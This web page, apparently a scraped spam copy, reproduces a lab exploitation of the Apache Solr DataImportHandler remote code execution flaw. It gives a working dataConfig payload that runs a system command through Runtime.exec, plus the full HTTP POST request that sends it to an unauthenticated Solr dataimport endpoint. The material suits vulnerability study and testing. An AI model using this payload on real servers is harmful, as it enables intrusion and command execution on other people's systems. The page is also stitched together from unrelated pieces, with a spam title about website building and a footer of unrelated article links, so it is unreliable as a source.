当前位置: 首页 > news >正文

长春建站网站建设交互设计是做什么的

长春建站网站建设,交互设计是做什么的,wordpress+博客+简书,盐城建设网站Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。此次漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能&#…

Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。此次漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能,其中所有的DIH配置都可以通过外部请求的dataConfig参数来设置。由于DIH配置可以包含脚本,因此攻击者可以通过构造危险的请求,从而造成远程命令执行。

访问`http://your-ip:8983/`即可查看到Apache solr的管理页面,无需登录。

1.首先在页面左侧选择`demo`核心,打开Dataimport面板,开启右侧Debug mode,填入以下POC:

<dataConfig><script><![CDATA[function poc(){ java.lang.Runtime.getRuntime().exec("touch /tmp/success");}]]></script><document><entity name="sample"fileName=".*"baseDir="/"processor="FileListEntityProcessor"recursive="false"transformer="script:poc" /></document>
</dataConfig>

2.利用burpsuite发送以下请求包:

POST /solr/demo/dataimport?_=1708782956647&indent=on&wt=json HTTP/1.1
Host: your-ip:8983
Content-Length: 613
Accept: application/json, text/plain, */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-type: application/x-www-form-urlencoded
Origin: http://your-ip:8983
Referer: http://your-ip:8983/solr/
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
Connection: closecommand=full-import&verbose=false&clean=false&commit=true&debug=true&core=demo&dataConfig=%3CdataConfig%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22touch+%2Ftmp%2Fsuccess%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22sample%22%0A++++++++++++fileName%3D%22.*%22%0A++++++++++++baseDir%3D%22%2F%22%0A++++++++++++processor%3D%22FileListEntityProcessor%22%0A++++++++++++recursive%3D%22false%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport

3.命令成功执行

http://www.yayakq.cn/news/729224/

相关文章:

  • 菏泽去哪了做网站怎么搜索整个网站内容
  • 电子商务网站推广的目的wordpress账号会员制
  • 专业集团门户网站建设企业企业网站制作策划书
  • 网站seo检测报告前端如何优化seo
  • 自己的做网站单页面网站现在
  • 某网站项目策划书网站建设经典教材
  • 网站综合建设笔记网站排名消失
  • 东莞网站建设营销平台的画册设计是什么
  • 网站开发 技术路线应用网站
  • 台州做网站seo的品牌建设和品牌打造方法
  • 怎样做网站的seo杭州官网
  • 网站qq一键登录网页源代码怎么打开
  • 腾讯云网站建设教程天津和平做网站哪家好
  • 教育网站改造方案电商网站设计 页面转化率
  • 南通网站建设服务WordPress手动切换主题
  • 28网站制作东莞企业建设网站官网有限公司
  • 企业网站开发介绍北京市公共资源交易中心
  • 石家庄最好的网站建设公司哪家好wordpress 缩略图优化
  • 泌阳县住房建设局网站四川做网站多少钱
  • 巢湖网站建设电话微信如何上传wordpress
  • 网站建设专家北京注安网站布局有哪些常见的
  • 代做毕业设计网站多少钱ps软件下载2022
  • 网站怎么防采集网络建设上市公司排名
  • 河南省濮阳市建设局网站网站吗
  • 程序员自己做网站怎么能来钱网站制作的基本概念
  • 赤峰做网站公司腾讯网
  • 东莞互联网营销网站建设天津市建设交易中心网站
  • 南通网站建设ntwsd.net做网站开发吗
  • 东莞seo计费优化网站搭建
  • 建立个人网站的费用莆田网站建设费用